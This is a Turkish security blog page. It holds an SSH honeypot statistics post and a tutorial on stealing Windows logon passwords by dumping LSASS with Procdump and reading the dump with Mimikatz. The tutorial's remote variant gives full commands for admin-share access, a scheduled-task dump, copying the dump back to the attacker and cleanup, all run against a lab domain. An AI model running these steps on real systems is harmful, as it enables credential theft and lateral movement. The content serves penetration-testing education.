SSH Tuzak Sistemleri ve Bir Saldırının Ayak İzleri

<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PxNMgsAZ-qU/Uj4XZ2V6eqI/AAAAAAAAAbw/S3BQdsJM5p0/s1600/honeypot.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="118" src="http://3.bp.blogspot.com/-PxNMgsAZ-qU/Uj4XZ2V6eqI/AAAAAAAAAbw/S3BQdsJM5p0/s200/honeypot.jpg" width="200" /></a></div><div style="text-align: justify;">Bu yazıda <a href="http://www.securityfocus.com/infocus/1876">http://www.securityfocus.com/infocus/1876</a> adresinde yayınlanan makale temel alınmıştır. Hazırlık aşamasında; SSH sunucu sistemi için tuzak sistem kurularak, sisteme gerçekleştirilen sızma denemelerinin detaylı analizi gerçekleştirilmiştir. Kurulan SSH tuzak sistemi yaklaşık bir ay kadar canlı olarak gözlemlenmiştir. Bu bir aylık süreç içerisinde sisteme erişim için denenen kullanıcı adları, şifreleri, kullanıcı adı/şifre ikilisi ve son olarak hangi ülkelerden erişim denemelerinin gerçekleştirildiği incelenmiştir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">SSH ( Secure Shell ) iki ağ cihazı arasında verinin güvenli bir biçimde iletilmesini sağlayan protokolün ismidir. Bu protokolün açık kaynak kod olarak Linux/Unix sistemlerde de kullanılan hali ise OpenSSH’dir. OpenSSH ile ilgili daha fazla bilgi için<a href="http://www.openssh.com/">http://www.openssh.com/</a> adresine başvurulabilir.<br /><a name="more"></a></div><br /><div style="text-align: justify;">Kurulan SSH tuzak sistem ile sisteme erişim sağlamak için yapılan denemelere ait detaylar incelenerek, SSH sunucu sistemleri için mevcut tehditler ele alınmaya çalışılmıştır. Makalenin son bölümünde ise SSH tuzak sistemlere başarılı bir şekilde erişim gerçekleştiren kullanıcıların, sistemler üzerindeki kayıt bilgileri incelenmiştir.</div><br /><div><b>Toplam Yetkisiz SSH Erişimi</b><br /><br />SSH tuzak sisteminin canlı olduğu süre içerisinde toplam olarak 9366 kullanıcı adı, şifre denemesi ile sisteme sızma girişimi gerçekleştirilmiştir. Daha öncede belirtildiği üzere bu denemeler SSH tuzak sistemin canlı olduğu bir aylık süre içerisinde gerçekleştirilen verileri içermektedir.</div><div><br /><b>En Çok Denenen Kullanıcı Adları ve Şifreleri</b><br /><br /><div style="text-align: justify;">Şekil 1’de görüldüğü üzere sisteme sızmak için en çok tercih edilen kullanıcı adı root olmuştur. Linux/Unix sistemlerde en yetkili kullanıcının root kullanıcısı olduğu göz önüne alındığında, sisteme gerçekleştirilen sızma denemeleri için tercih edilen ve edilecek kullanıcı adının root seçilmesi muhtemel görünmektedir. Bu noktada SSH sunucu servisi için alınabilecek güvenlik önlemlerinden bir tanesi, root kullanıcısının sisteme direkt giriş yapmasına izin vermemek olmalıdır. Önce sisteme yetkisiz bir kullanıcı olarak oturum açılmalı ve ardından root kullanıcı kimliğine bürünülmesi sağlanmalıdır. Bu şekilde sisteme root kullanıcı kimliği ile sızma denemeleri de önlenmiş olacaktır.</div></div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/ekil_1.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 1 En çok denenen 10 kullanıcı adı</span></td></tr></tbody></table>Yine aynı şekilde en çok denenen şifreler ise Şekil 2’de görülmektedir. Buradan da görüleceği üzere seçilecek şifrelerin kolay tahmin edilemeyecek olmasına dikkat edilmesi gerekmektedir.</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/ekil_2.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 2 En Çok Denenen 10 Şifre</span></td></tr></tbody></table><b>En Çok Denenen Kullanıcı Adı/Şifre İkilisi</b></div><div><br />Daha öncede belirtildiği üzere sisteme sızmak için en çok tercih edilen kullanıcı adı olarak root seçilmiştir. Bu bağlamda sisteme sızmak için denenen en çok kullanılan kullanıcı adı/şifre ikilisi root kulanıcısı için olacaktır. Bu durum Şekil 3’de gösterilmiştir.</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/ekil_3.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 3 En Çok Denenen Kullanıcı Adı/Şifre İkilileri</span></td></tr></tbody></table><span style="text-align: justify;">Sisteme sızmak için gerçekleştirilen kullanıcı adlarının, sistemde var olan kullanıcılara oranı ise %68 olarak göze çarpmaktadır. Bunun için alınabilecek önlemlerden bir tanesi kullanıcılar için kabuk ortamının sisteme oturum açmasını engelleyecek şekilde yapılandırılması, eğer kullanıcı sistemde kullanılmıyor ise kaldırması şeklinde olmalıdır.</span></div><div style="text-align: justify;"><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/ekil_4.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Tablo 1 Sistem Kullanıcıları İçin Yetkisiz Erişim Deneme Sayıları</span></td></tr></tbody></table><b>Denemelerin Ne Kadarı Botlar Tarafından Gerçekleştirildi ?</b></div><div><br /><div style="text-align: justify;">SSH tuzak sisteme gerçekleştirilen toplam 9366 demeden 2 tanesi gerçek sisteme sızma denemesi olarak tespit edilmiştir. Bu orandan da görüleceği üzere denemelerin çok büyük bir kısmı otomatik araçlar tarafından gerçekleştirilmiştir. Bu tarz otomatik tarama araçları ile gerçekleştirilen sızma denemelerini önlemek için alınabilecek önlemlerden bir tanesi de SSH servisinin hizmet verdiği ön tanımlı port numarasının değiştirilmesi olmalıdır.</div></div><div><b>Denemelerin En Çok Gerçekleştirildiği Ülkeler</b><br /><br /><div style="text-align: justify;">Kurulan tuzak sistemin Amerika Birleşik Devletleri lokasyonlu olduğu göz önünde bulundurulacak olursa, en çok sızma denemesi sırası ile Amerika Birleşik Devletleri, Çin ve Mısır’dan gerçekleştirilmektedir. Bu duruma ait istatiksel ve yüzdesel bilgiler Tablo 2 ve Şekil 5’ de gösterilmektedir.</div></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/tablo_1.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Tablo 2 Yetkisiz Erişim Denemelerinin Gerçekleştirildiği Ülke İsimleri ve Deneme Sayıları</span></td></tr></tbody></table></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><img src="http://www.bilgiguvenligi.gov.tr/images/stories/galkan/ssh/ekil_5.jpg" style="margin-left: auto; margin-right: auto;" /></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: start;">Şekil 4 Yetkisiz Erişim Denemelerinin Gerçekleştirildiği Ülke İsimleri ve Deneme Yüzdeleri</span></td></tr></tbody></table></div><div><b>Bir Saldırının Ayak İzleri</b><br /><br /><div style="text-align: justify;">SSH tuzak sistemine başarılı bir şekilde erişim sağlayan kullanıcıların, sistem üzerinde kullandıkları komutlar incelenmiş ve olası senaryolar üzerinde durulmuştur. Sisteme erişim sağlayan kullanıcıların ilk olarak en çok denedikleri komutun wget olduğu gözlemlenmiştir. wget, ftp, lynx, curl vb. gibi komut satırından çalışan, uzak sistemlerden dosya temin etmek için kullanılan komutlar yardımı ile sistem üzerinde zararlı kod çalıştırarak yetkili kullanıcı haklarına sahip olunmaya çalışılmıştır. Yine bunun yanında uname, uptime ve ps gibi komutlarla sistem çalışma durumu , sistem üzerinde çalışan süreçler ve çekirdek hakkında bilgi toplanmaya çalışılmıştır.</div></div>

SSH Tuzak Sistemleri ve Bir Saldırının Ayak İzleri

Bu yazıda http://www.securityfocus.com/infocus/1876 adresinde yayınlanan makale temel alınmıştır. Hazırlık aşamasında; SSH sunucu sistemi i...

Read more »

Procdump ve Mimikatz ile LSASS İçerisinden Oturum Açan Kullanıcıların Parolalarını Elde Etme

<div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LLGqK4xWLlsXuK9UqPlbQcASJFWREVi9a7SEQvQY9EOVR9HiYLOE1LkG3MX0qLrzL4uuduMwCTvH0B9OZBBG1cCy6a-2kq7mQgxrs_P1Fgu0aTjJR3b6B9Nz3Z3mHolAm-P2HhAMFb0/s1600/01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LLGqK4xWLlsXuK9UqPlbQcASJFWREVi9a7SEQvQY9EOVR9HiYLOE1LkG3MX0qLrzL4uuduMwCTvH0B9OZBBG1cCy6a-2kq7mQgxrs_P1Fgu0aTjJR3b6B9Nz3Z3mHolAm-P2HhAMFb0/s320/01.jpg" width="320" /></a></div>Mimikatz bir prosesin (içerisinde kimlik bilgileri barındıran LSASS.exe) içinden logon olmuş kullanıcıların parolalarını çekebilmektedir. Böylece oturum açılabilen ama AV gibi engelleyici sistemler yüzünden mimikatz/wce çalıştırılamayan makinelerde proses içerisinden bu kimlik bilgileri elde edilebilir. Bu aracın çalışma mekanizması ile ilgili ayrıntılı bilgi için bakınız:<br /><a href="http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html">http://www.agguvenligi.net/2013/09/wce-ve-mimikatz-ile-windows-parolasi-elde-edilmesi.html</a><br /><br /><br /><br />Proses içerisinden parolaları elde edebilmek için öncelikle ele geçirilen kritik makineden LSASS prosesinin dump dosyası alınır:</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNEwUgKLyRWuyHIUTIaeoR7LObUrrURU0XHylIeAhczI0Mgr4uk7MZxCMgMh2bn5uv5VO1vT_9ZUbpA_J137Q1qHKkREdR1umwdYxGYtNqHVPYTrV9M8qCdNN_TTLJLEJl5d8nUueI5lY/s1600/00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNEwUgKLyRWuyHIUTIaeoR7LObUrrURU0XHylIeAhczI0Mgr4uk7MZxCMgMh2bn5uv5VO1vT_9ZUbpA_J137Q1qHKkREdR1umwdYxGYtNqHVPYTrV9M8qCdNN_TTLJLEJl5d8nUueI5lY/s320/00.png" width="308" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Proses dump dosyasının alınması</td></tr></tbody></table><br /><div style="text-align: justify;"><b>Not: </b>Ekran görüntüsünde de görüldüğü gibi, Şirket etki alanında bulunan bir sunucuda 3 kullanıcının (StandartKullanici1, YoneticiKullanici1, Administrator) bilgisayarda oturum açtığı görülmektedir.</div><br />Bu dosya bir yere kaydolur:<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_kaKt2-rKkWpdrMw0pT9yliczxAxh1EXt89ldF1Q8RIMPmBpkaA_gemiE-Jf4oyKFzA1Ju23f9A60eTpeB5aPKFrRkgxAp4H1Yn4vnF_iiVSY38ct7xF9kNabscv3TugAf3drJhZf2I/s1600/01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS_kaKt2-rKkWpdrMw0pT9yliczxAxh1EXt89ldF1Q8RIMPmBpkaA_gemiE-Jf4oyKFzA1Ju23f9A60eTpeB5aPKFrRkgxAp4H1Yn4vnF_iiVSY38ct7xF9kNabscv3TugAf3drJhZf2I/s320/01.png" width="309" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dump dosyasının kaydedilmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Bu dump dosyası, RDP ile yerel disk paylaşımı yolu veya başka bir yol ile aynı mimariye sahip bir makineye alınır. Bu örnekte Windows Server 2008 R2 makineler kullanılmıştır. Bu makine üzerinde Mimikatz çalıştırılacağı için, makinenin sanal makine olması tercih edilir. Ayrıca mimikatz’ın çalışmasını engelleyen tüm sistemler devre dışı bırakılır.</div><div style="text-align: justify;"><br /></div>Sanal makinede aşağıdaki uygulamalar hazır bulunmalıdır:<br /><ul><li><b>Procdump:</b> <a href="http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx</a></li><li><b>Mimikatz:</b> <a href="http://blog.gentilkiwi.com/mimikat">http://blog.gentilkiwi.com/mimikat</a>z --> <b>“mimikatz_trunk\alpha\x64”</b> dizinindeki <b>mimikatz.exe</b> kullanılacaktır.</li></ul><br />Bu iki uygulama ve alınan dump sanal makinede bir klasöre konulur.<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxtf-qxjX-HKNxVU97vH-my8pvzwe7sOtFMu2QHN0oRVUmHTVp1SlK-2pZymG2A0PlUDQikxuUHWu_5fp6WG-dT7xaDFwYXYlitZ751r6_P_QlWBV5b_8L-KAJEMuoa0rgjyqS3PoS9w/s1600/02.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxtf-qxjX-HKNxVU97vH-my8pvzwe7sOtFMu2QHN0oRVUmHTVp1SlK-2pZymG2A0PlUDQikxuUHWu_5fp6WG-dT7xaDFwYXYlitZ751r6_P_QlWBV5b_8L-KAJEMuoa0rgjyqS3PoS9w/s320/02.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dump dosyası ve kullanılacak diğer araçların listelenmesi</td></tr></tbody></table><br /><div style="text-align: justify;">Örnek olması açısından mimikatz uygulaması, bilgisayar adı "SRV" olan sanal sunucuda çalıştırılacaktır. Görüldüğü gibi, sadece oturumu açık olan Administrator kullanıcısının parolası (Test123) elde edilebilmektedir. Çalıştırılan komutlar aşağıdaki gibidir:</div><blockquote class="tr_bq"><i>mimikatz</i><br /><i>privilege::debug</i><br /><i>sekurlsa::logonPasswords full</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5PGt6NOqau3I7hzks6_Y98S1nhT4APoTyASrwdcrXLkmKyoBGeHVElLhlGX9xOShKWrRIJs3Jdtn28ppOAuz0yUW46CTYVnsNThbP-e58AT7W5Cd7h4VPD11J0trr4Fw-EyWDQbEjFOs/s1600/03.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5PGt6NOqau3I7hzks6_Y98S1nhT4APoTyASrwdcrXLkmKyoBGeHVElLhlGX9xOShKWrRIJs3Jdtn28ppOAuz0yUW46CTYVnsNThbP-e58AT7W5Cd7h4VPD11J0trr4Fw-EyWDQbEjFOs/s1600/03.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Mimikatz aracının standart kullanımı</td></tr></tbody></table><br /><div style="text-align: justify;">Dump bilgisi alınan bilgisayarda oturum açmış olan kullanıcıların parola bilgilerini almak için sanal makinedeki LSASS prosesine, dump bilgisi alnan LSASS prosesi yazılacaktır. Daha sonra da yukarıdaki örneğe benzer olarak LSASS prosesine DLL enjeksiyonu gerçekleştirilerek proseste kayıtlı olan parola bilgileri alınacaktır. Bu amaçla, komut satırından hazırlanan klasöre gelinerek aşağıdaki komutlar çalıştırılır.</div><blockquote class="tr_bq"><i>procdump -accepteula -ma lsass.exe lsass.dmp</i><br /><i>mimikatz.exe</i><br /><i>sekurlsa::minidump lsass.dmp</i><br /><i>sekurlsa::logonPasswords</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZirVGDrzI9LzBkkJyRf-x_ox0RBhnTFf5cDWEYFL7BwR4mEBn1AamL1wwcjJh8TUc1NWXHBJKuJo-qm9LraO2w3KhypeJK-dnQx-NiqjwSI7XHkdO8VoYFlSArqYzm7we1uocEF-DVH0/s1600/04.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZirVGDrzI9LzBkkJyRf-x_ox0RBhnTFf5cDWEYFL7BwR4mEBn1AamL1wwcjJh8TUc1NWXHBJKuJo-qm9LraO2w3KhypeJK-dnQx-NiqjwSI7XHkdO8VoYFlSArqYzm7we1uocEF-DVH0/s320/04.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dış sistemden alınan LSASS prosesinin içerisindeki bilgilerin iç sistemde elde edilmesi </td></tr></tbody></table><br />Böylece, oturum açmış olan kullanıcıların parola özetleri ve parolalarının açık hali elde edilir.<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjAhOjsRsl_Wh0Nl5M6R1D_KstKdB_7NVYX0fcVQfNvnFnf3DePBw6zQpiQAn1VUrO8f4ia75lY3ohXcyPkc8Xbn0qSS4A3-AVk-g0bULZwlutGvh4fL6XOJrZZuNmDesBRelhKmkGps/s1600/05.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCjAhOjsRsl_Wh0Nl5M6R1D_KstKdB_7NVYX0fcVQfNvnFnf3DePBw6zQpiQAn1VUrO8f4ia75lY3ohXcyPkc8Xbn0qSS4A3-AVk-g0bULZwlutGvh4fL6XOJrZZuNmDesBRelhKmkGps/s320/05.png" width="260" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Parola bilgilerinin listelenmesi</td></tr></tbody></table><br /><b>Not:</b> LSASS prosesi haricinde bir proses kullanıldığında aşağıdaki gibi hata mesajları alınabilmektedir.<br /><blockquote class="tr_bq"><i>ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations</i><br /><i>ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory</i></blockquote><br /><div style="text-align: justify;"><b>Not: </b>Dump alma işlemi, Exchange Server 2010 CAS/MBS rolüne sahip bir sunucuda gerçekleştirilirse, mail yollamak için bu sunucudan DC'ye  giden tüm kullanıcıların parolaları elde edilebilir. Bu sebeple, DC'ye erişimlerin yanında Exchange sunucuya erişimler de önem arz etmektedir.</div><br /><h4>LSASS Dump Dosyasının Uzak Makineden Alınması</h4><div style="text-align: justify;">Yukarıdaki adımlarda uzak makineye RDP gerçekleştirilerek dump dosyası alınmıştı. RDP, FW tarafından engellenmişse, yönetimsel paylaşımlar ve zamanlanmış görevler kullanılarak da bu işlemler gerçekleştirilebilir. Bu amaçla bir zamanlanmış görevin çalıştırılacağı bir betik (Procdump_Betik.bat) hazırlanır. Betik içeriği şu şekildedir:</div><blockquote class="tr_bq"><i>@echo off</i><br /><i>C:\Yeni_Klasor\procdump.exe -accepteula -ma lsass.exe C:\Yeni_Klasor\Hedef_LSASS.dmp</i></blockquote>Bu betik çalıştığı makinede LSASS prosesinin dump'ını C:\Yeni_Klasor içerisine bir dosyaya atmaktadır.<br /><br /><div style="text-align: justify;">Saldırganın makinesinin (SRV adlı / 192.168.100.102 IP adresli makine)  masaüstünde Test adlı bir klasörde bu betik, Procdump ve Mimikatz uygulamaları bulunmaktadır:</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9zA-bSxHV8sgNYV-hmQWPsuApqhgjpn-usr9e6HNxwYpb_kstEm5GXHTJRENimNW2B48LTyy11eUPGFmmVjXgS0a1BJx3SEHdzMCgkPj62v-yQZY66TTKBLAOwWeIicM0-1u2sndzto/s1600/06.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9zA-bSxHV8sgNYV-hmQWPsuApqhgjpn-usr9e6HNxwYpb_kstEm5GXHTJRENimNW2B48LTyy11eUPGFmmVjXgS0a1BJx3SEHdzMCgkPj62v-yQZY66TTKBLAOwWeIicM0-1u2sndzto/s1600/06.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinedeki LSASS prosesinin alınması için gerekli araçların listelenmesi</td></tr></tbody></table><span style="text-align: justify;"><br /></span><span style="text-align: justify;">Saldırgan ele geçirdiği hedef makinenin (DC adlı / 192.168.100.101 IP adresli makine) C diskine Yeni_Klasör adlı bir dizin oluşturur. Bu amaçla kullanılan komutlar şu şekildedir:</span><br /><blockquote class="tr_bq"><i>net use \\192.168.100.101\C$ /user:Sirket\Saldirgan Deneme123?</i><br /><i>dir \\192.168.100.101\C$</i><br /><i>mkdir \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzy8r8Arhp4ZshIvpE9ACJ-4GPaC4h1zg-OXpWZ6JrXTsbfwelaFMugi7QqS-rCsLOPx-Foksamuls5taJwQmsu4rQzUYKt7VL0zwMCaxvM1IjVGdRTjlyUVIWc3bXGc-KHiuuiVVrL1E/s1600/07.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzy8r8Arhp4ZshIvpE9ACJ-4GPaC4h1zg-OXpWZ6JrXTsbfwelaFMugi7QqS-rCsLOPx-Foksamuls5taJwQmsu4rQzUYKt7VL0zwMCaxvM1IjVGdRTjlyUVIWc3bXGc-KHiuuiVVrL1E/s320/07.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinenin diski ile map işleminin başlatılması</td></tr></tbody></table>Daha sonra Procdump uygulaması ve betik hedef makineye kopyalanır.<br /><blockquote class="tr_bq"><i>copy C:\Users\Administrator\Desktop\Test\procdump.exe \\192.168.100.101\C$\Yeni_Klasor</i><br /><i>copy C:\Users\Administrator\Desktop\Test\Procdump_Betik.bat \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGw4WRFjDXJ3Yu9YBv9tq54wpn27VSCAkkev0QgZrUrqThGfCahnayRafVz09cMwA-aAqe4wc6YUTWkhZvg7NxF_0L8qvSsXQvlIDJBG7X15QTIjojesxyA7HB9Qcjsugr8AA5QUn73HQ/s1600/08.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGw4WRFjDXJ3Yu9YBv9tq54wpn27VSCAkkev0QgZrUrqThGfCahnayRafVz09cMwA-aAqe4wc6YUTWkhZvg7NxF_0L8qvSsXQvlIDJBG7X15QTIjojesxyA7HB9Qcjsugr8AA5QUn73HQ/s320/08.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makineye Procdump aracının ve betiğin gönderilmesi</td></tr></tbody></table><br /><div style="text-align: justify;"><b>Not:</b> Yukarıda gerçekleştirilen betiği ve uygulamayı karşı makineye gönderme işlemleri Run penceresi kullanılarak da görsel bir şekilde gerçekleştirilebilirdi.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7vS868XAoI8sYQbCK6v6n6IXhzPuI3Y4kugwLdsnrtg12vTBoD52er7HqIddDRfdYDDbqMYSd0VOotuO3JxGl99l_ernBQ8BvhSSQxmXTNj3aVhSdOgHzru0BDL_Ak49-eEVQBoXQivQ/s1600/09.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7vS868XAoI8sYQbCK6v6n6IXhzPuI3Y4kugwLdsnrtg12vTBoD52er7HqIddDRfdYDDbqMYSd0VOotuO3JxGl99l_ernBQ8BvhSSQxmXTNj3aVhSdOgHzru0BDL_Ak49-eEVQBoXQivQ/s320/09.jpg" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Uzak makinenin diskine erişim için alternatif yol (Paylaşıma girilmesi)</td></tr></tbody></table><br />Hedef sistemin saatine bakılır ve bir dakika sonrasında çalışacak şekilde bir zamanlanmış görev oluşturulur.<br /><blockquote class="tr_bq"><i>net time \\192.168.100.101</i><br /><i>at \\192.168.100.101 10:32 C:\Yeni_Klasor\Procdump_Betik.bat</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwS7TZg0NmWTlHtTcwsGGYJHAI8OiJ3TE8QbpPl7vwqYHj3vycktYMHlh86b_D2bbeIqTNzNQrk-_mMHCeIoxarG-IuMzlbLQJ1Uk2H-XbFMVuMkkk5iC1GaqZHzURv2658sySQmk6OY/s1600/03.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwS7TZg0NmWTlHtTcwsGGYJHAI8OiJ3TE8QbpPl7vwqYHj3vycktYMHlh86b_D2bbeIqTNzNQrk-_mMHCeIoxarG-IuMzlbLQJ1Uk2H-XbFMVuMkkk5iC1GaqZHzURv2658sySQmk6OY/s400/03.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Betiği çalıştırmak için zamanlanmış görevin oluşturulması</td></tr></tbody></table><b><br />Not: </b>Bu işlem yerine hedef makinede çalışacak şekilde PSExec aracı da kullanılabilirdi.<br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Zamanlanmış görev çalışması teyit edilir ve oluşan dump dosyası saldırgan makinesine kopyalanır. Kopyalama işlemi tamamlandıktan sonra, oluşturulan klasör silinir.</div><blockquote class="tr_bq"><i>dir \\192.168.100.101\C$\Yeni_Klasor</i><br /><i>copy \\192.168.100.101\C$\Yeni_Klasor\Hedef_LSASS.dmp Desktop\Test</i><br /><i>dir Desktop\Test</i><br /><i>rmdir /s \\192.168.100.101\C$\Yeni_Klasor</i></blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfuF79vXsghPggfVUOCVQB3Pttyy_JvIE88A3NfTtR5N5Jwgm_jllajOjTcuFWo2STqJAMjWhO1l9OImVKfdwV3ZGBggPBomaQ_cDZXPuMpaRN7eeFjUEjhHx_M8g8AohfjvEnUjJ2xg/s1600/11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlfuF79vXsghPggfVUOCVQB3Pttyy_JvIE88A3NfTtR5N5Jwgm_jllajOjTcuFWo2STqJAMjWhO1l9OImVKfdwV3ZGBggPBomaQ_cDZXPuMpaRN7eeFjUEjhHx_M8g8AohfjvEnUjJ2xg/s320/11.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Oluşan dump dosyasının hedef sistemden alınması</td></tr></tbody></table><br />Son durumda saldırganın Test klasöründeki dosyalar şu şekilde olur.<br /><table align="center" cellpadding="0" 